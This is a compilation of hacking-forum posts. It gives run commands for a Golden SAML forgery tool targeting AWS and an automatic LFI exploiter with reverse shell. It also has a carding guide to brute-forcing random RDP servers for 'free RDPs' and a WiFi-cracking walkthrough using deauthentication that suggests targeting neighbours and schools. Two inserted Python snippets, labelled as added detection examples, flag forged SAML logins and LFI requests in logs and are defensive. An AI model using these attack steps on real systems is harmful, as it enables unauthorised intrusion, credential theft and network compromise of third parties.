UNDERCODE COMMUNITY

🦑 A tool that implements the Golden SAML attack
> shimit allows the user to create a signed SAMLResponse object and use it to open a session in the Service Provider. shimit now supports AWS Console as a Service Provider.
> After generating and signing the SAMLResponse's assertion, shimit will call the AssumeRoleWithSAML() API in AWS. Then, the session token and key will be applied to a new session, where the user can use aws cli to perform actions using the permissions obtained using the golden SAML.

🦑 INSTALLATION & RUN :

1) python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

2) git clone https://github.com/cyberark/shimit

3) python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

4) idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust

pk - Private key file full path (pem format)

c - Certificate file full path (pem format)

u - User and domain name e.g. domain\username (use \ or quotes in *nix)

n - Session name in AWS

r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.

id - AWS account id e.g. 123456789012

5) Save SAMLResponse to file
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml

o - Output encoded SAMLResponse to a specified file path

6) Load SAMLResponse from file
python .\shimit.py -l saml_response.xml

🦑 Tested by undercode

> TERMUX-LINUX
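
Because the assertion described above is signed outside the Identity Provider, the AssumeRoleWithSAML call reaches AWS without a matching token issuance on the IdP. The following is an added detection example, not part of the post or of shimit: the CloudTrail records are constructed and reduced to a few fields, the IdP issuance export uses a hypothetical schema, and matching on `userName` is an assumption about how the federation is configured.

```python
from datetime import datetime, timedelta

# Constructed sample: CloudTrail-style records, reduced to the fields used here.
CLOUDTRAIL = [
    {"eventTime": "2020-03-10T09:00:40Z", "eventName": "AssumeRoleWithSAML",
     "userIdentity": {"type": "SAMLUser", "userName": "alice@example.com"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/ADFS-monitor",
                           "sAMLAssertionID": "_constructed-assertion-1"}},
    {"eventTime": "2020-03-10T11:30:00Z", "eventName": "AssumeRoleWithSAML",
     "userIdentity": {"type": "SAMLUser", "userName": "admin@example.com"},
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/ADFS-admin",
                           "sAMLAssertionID": "_constructed-assertion-2"}},
    {"eventTime": "2020-03-10T11:31:00Z", "eventName": "ListBuckets",
     "userIdentity": {"type": "AssumedRole"}, "requestParameters": None},
]

# Hypothetical, simplified export of the IdP's own token-issuance log.
IDP_ISSUED = [{"time": "2020-03-10T09:00:35Z", "user": "alice@example.com"}]

def _ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")

def unmatched_saml_logins(cloudtrail, idp_issued, window=timedelta(minutes=5)):
    """Return AssumeRoleWithSAML events with no IdP issuance for the same
    user in the preceding `window` (the IdP never minted that assertion)."""
    issued = [(e["user"].lower(), _ts(e["time"])) for e in idp_issued]
    findings = []
    for ev in cloudtrail:
        if ev.get("eventName") != "AssumeRoleWithSAML":
            continue
        user = ev["userIdentity"]["userName"].lower()
        when = _ts(ev["eventTime"])
        matched = any(u == user and timedelta(0) <= when - t <= window
                      for u, t in issued)
        if not matched:
            params = ev["requestParameters"]
            findings.append({"time": ev["eventTime"], "user": user,
                             "role": params["roleArn"],
                             "assertion": params["sAMLAssertionID"]})
    return findings

if __name__ == "__main__":
    for finding in unmatched_saml_logins(CLOUDTRAIL, IDP_ISSUED):
        print("no IdP issuance for", finding)
```
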

🦑 Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
> termux root - linux - windows - osx

🦑 FEATURES :

Works with Windows, Linux and OS X

Automatic Configuration

Automatic Update

Provides 8 different Local File Inclusion attack modalities:

/proc/self/environ
php://filter
php://input
/proc/self/fd
access log
phpinfo
data://
expect://

Provides a ninth modality, called Auto-Hack, which scans and exploits the target automatically by trying all the attacks one after the other without you having to do anything (except for providing, at the beginning, a list of paths to scan, which if you don't have you can find in this project directory in two versions, small and huge).

Tor proxy support

Reverse Shell for Windows, Linux and OS X

🦑 INSTALLATION & RUN :

1) git clone https://github.com/D35m0nd142/LFISuite

2) cd LFISuite

3) Run python socks for Linux and the script, or run the .exe for Windows

4) Once you have an LFI shell from one of the available attacks, you can easily obtain a reverse shell by entering the command "reverseshell" (obviously you must put your system listening for the reverse connection, for instance using "nc -lvp port").
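
Each of the eight modalities listed above leaves a recognisable string in the request line, so a web-server access log can be checked for them. This is an added example, not part of the post or of LFISuite: the log lines are constructed, the parameter name `page` is hypothetical, and the patterns are one reasonable indicator per modality rather than a complete rule set.

```python
import re
from urllib.parse import unquote

# One pattern per modality named in the feature list, matched against the
# decoded query string of each request.
PATTERNS = {
    "/proc/self/environ": r"/proc/self/environ",
    "php://filter": r"php://filter",
    "php://input": r"php://input",
    "/proc/self/fd": r"/proc/self/fd/\d+",
    "access log": r"/(?:access[._]log|var/log/(?:apache2|httpd|nginx)/)",
    "phpinfo": r"/tmp/php[A-Za-z0-9]{6}",  # PHP temp upload file name on Linux
    "data://": r"data:(?://|text/)",
    "expect://": r"expect://",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in PATTERNS.items()}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2020:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2020:10:00:05 +0000] "GET /index.php?page=php://filter/resource=index HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Mar/2020:10:00:09 +0000] "GET /index.php?page=..%252f..%252fproc%252fself%252fenviron HTTP/1.1" 200 733',
    '203.0.113.7 - - [10/Mar/2020:10:00:12 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 90',
    '203.0.113.7 - - [10/Mar/2020:10:00:15 +0000] "GET /index.php?page=../../var/log/apache2/access.log%00 HTTP/1.1" 200 9001',
    '198.51.100.4 - - [10/Mar/2020:10:02:00 +0000] "GET /phpinfo.php HTTP/1.1" 200 70000',
]

def decode(target, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target.replace("\x00", "")

def classify(line):
    """Return the modality names whose indicator appears in the request."""
    match = REQUEST.search(line)
    if not match:
        return []
    query = decode(match.group(1)).partition("?")[2]
    return [name for name, rx in COMPILED.items() if rx.search(query)]

def scan(lines):
    """Map 1-based line number to matched modalities, skipping clean lines."""
    hits = {i: classify(line) for i, line in enumerate(lines, 1)}
    return {i: names for i, names in hits.items() if names}
```

Calling `scan(SAMPLE_LOG)` flags lines 2 to 5 and leaves the ordinary page request and the plain `phpinfo.php` request unflagged.
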

🦑 Top carding: How to Crack a VPS/RDP ( GET FREE RDP'S ) :

Hello, today we'll be learning how to crack ez VPS/RDP's (Remote Desktop Connection). Follow each step and get yourself free RDP's instead of paying

🦑 Tools Needed:
KPort Scanner
(Download: https://anonfile.com/w699R4w9bd/KPortScan_3.0_rar )

DUBrute
(Download: https://dailyuploads.net/mgvxio5yssx6 )

IP address list
https://www.countryipblocks.net/acl.php
––––––––––
🦑 STEPS:
1] Download DUBrute & KPORT SCANNER from above links and install them

2] Go here
https://www.countryipblocks.net/country_selection.php

And copy all ip address & paste in kport scan. After clicking start button don't change anything

3] Find some ips in count of goods. They will automatically be saved in results.

4] Now open DUBrute
- Click on Generation, another window will open.
Now this step is pretty self explanatory, You must load each of the .txt files in its field.
- For IP click on File IP and browse to the results.txt file you saved in kport scan folder.
- For Login click on File Login and browse to the DUBrute Folder.
You'll find a .txt file named Login. Select that file. For Password click on File Pass and again browse to the DUBrute Folder.
You'll find a .txt file named Pass. That is the file you need.

5] When you get some Good IPs, it's time to connect to the VPS/RDP. The working IPs are stored in a .txt file named Good in the DUBrute folder.
They are in the format 111.222.333.444@username:password.
––––––––––
Now you have your FREE VPS/RDP, Enjoy

🦑 2020 updated: Generate a custom wordlist for brute force with more speed and success :

🦑 INSTALLATION & RUN :


1) git clone https://github.com/digininja/CeWL

2) cd CeWL

3) ./cewl.rb

CeWL 5.4.2 (Break Out) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Usage: cewl [OPTIONS] ... <url>

OPTIONS:
-h, --help: Show help.
-k, --keep: Keep the downloaded file.
-d <x>,--depth <x>: Depth to spider to, default 2.
-m, --min_word_length: Minimum word length, default 3.
-o, --offsite: Let the spider visit other sites.
-w, --write: Write the output to the file.
-u, --ua <agent>: User agent to send.
-n, --no-words: Don't output the wordlist.
-a, --meta: include meta data.
--meta_file file: Output file for meta data.
-e, --email: Include email addresses.
--email_file <file>: Output file for email addresses.
--meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
-c, --count: Show the count for each word found.
-v, --verbose: Verbose.
--debug: Extra debug information.

Authentication
--auth_type: Digest or basic.
--auth_user: Authentication username.
--auth_pass: Authentication password.

Proxy Support
--proxy_host: Proxy host.
--proxy_port: Proxy port, default 8080.
--proxy_username: Username for proxy, if required.
--proxy_password: Password for proxy, if required.

Headers
--header, -H: In format name:value - can pass multiple.

<url>: The site to spider.

🦑 Running CeWL in a Docker container
To quickly use CeWL on your machine with Docker, you have to build it :

1) Build the container :
docker build -t cewl .

2) Container usage without interacting with local files :
docker run -it --rm cewl [OPTIONS] ... <url>

3) Container usage with local files as input or output :
# you have to mount the current directory when calling the container
docker run -it --rm -v "${PWD}:/host" cewl [OPTIONS] ... <url>


🦑 Hack WiFi in 15 Minutes‼️

🦑 LET'S START :

1) Download kali linux - https://www.kali.org/downloads/
1.1 Install Kali Linux on a USB flash drive or virtual machine
1.3 Run from a USB flash drive or virtual machine under Kali
2. Open the console
2.1 We write: iwconfig and check for our network card. If you have problems at this point (this will not happen with laptops), then you need to buy such a card. For 300 rubles you can get a USB TP-Link card from AliExpress and everything will be fine.
2.2 Now we turn on the monitoring mode: airmon-ng start wlan0 (wlan0 is the value from the parameters of the network card; you may have a slightly different one, for example mon0)
2.3 Now you need to scan: airodump-ng wlan0
2.4 Here we will see a list of Wi-Fi networks within the radius of our device, it depends on the network card. Here we need to select the target of the attack, we choose according to your taste, I usually take the one who has the best signal (The signal level is determined by the abbreviation pwr)
2.5 Now we need to press ctrl + c and stop scanning
2.6 Select the victim and write: airodump-ng --bssid (here we write the BSSID of the victim's router, you see it above) --channel (here we write the channel, it is indicated as ch, for example 1 or 8) -w /tmp/nazvanie (this is the path and name of the final file) wlan0
2.7 At the very bottom we see those who are connected to the network; we select the one with the larger number in the Frames value (it is more active)
3. Open another console and write: aireplay-ng -0 1 (1 is the number of deauthentication packets; put 50 right away and wait) -a (here we write the router's BSSID, we see it in the very top line with its characteristics: signal level, channel, etc.) -s (MAC address of the user we are attacking, you can find their MAC under STATION) wlan0
3.1 We wait until a handshake message appears in the first console; it will be shown there for a while, at the top. We repeat this command in the second console until the handshake is captured. If it doesn't work at all, then we write this command instead: aireplay-ng -0 1 -a AP_BSSID -c CLIENT_BSSID mon0 --ignore-negative-one (this is for Android devices); you can also deauthenticate the entire network at once: aireplay-ng --deauth 5 -a (here you enter the router's MAC) wlan0
4. When we received the handshake, we go along the path that we indicated and:
4.1 Decrypt this hash ourselves, or give it to people who can do it
4.2 Use the https://xsrc.ru service (not an ad) and submit the hash there; it finds the password quickly (for me in a couple of seconds). It may take longer, but obviously faster than on my 2009 laptop :D
After decryption, you will receive a notification e-mail, and to get the password you need a key; 1 costs 100 rubles, the more you buy, the cheaper. This is the only downside of this method, but I prefer it. After purchasing the key, it will arrive by e-mail; then enter it on the site and you're done.
That's ready; now it's ours! We do what we want with the network: we replace the DNS, listen to traffic or just watch movies and sit on our favorite forum :)

http://wpa-sec.stanev.org/ Service for decrypting hashes for free,

🦑 A few words about security at work:
If you use this method on your neighbors, at school, university, and other simple places, it does not matter. If you go to an office, company, or any place that has important data, get ready. Learn basic security concepts in Kali Linux. Although it is unlikely that a more or less serious company has only the simplest protection that can be opened in this way. Usually they have data going through their server, which needs to be broken into in order to get a password.
On security, when you are sitting on a hacked / free WiFi point, I'll tell you a couple of rules:
Use a VPN
Try not to log in to important services
Or use a VPN + Tor bundle
Or instead of vpn you can use ssh tunnel.
